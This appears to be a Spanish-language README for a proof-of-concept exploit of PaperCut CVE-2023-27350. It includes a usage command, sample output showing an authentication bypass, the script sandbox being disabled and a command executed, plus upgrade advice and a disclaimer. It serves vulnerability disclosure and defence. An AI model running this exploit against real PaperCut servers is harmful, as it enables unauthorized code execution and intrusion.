
Exploit de Prueba de Concepto para PaperCut CVE-2023-27350
POC para CVE-2023-27350 que afecta a PaperCut MF/NG
Un análisis técnico de causa raíz de la vulnerabilidad, indicadores de compromiso y exposición a Internet se puede encontrar en nuestro blog: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Este POC utiliza una vulnerabilidad de omisión de autenticación encadenada con el abuso de la funcionalidad de scripting integrada para ejecutar código.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Actualice a la última versión o mitigue siguiendo las instrucciones del Aviso de Seguridad de PaperCut
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se cuente con autorización explícita. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo con responsabilidad.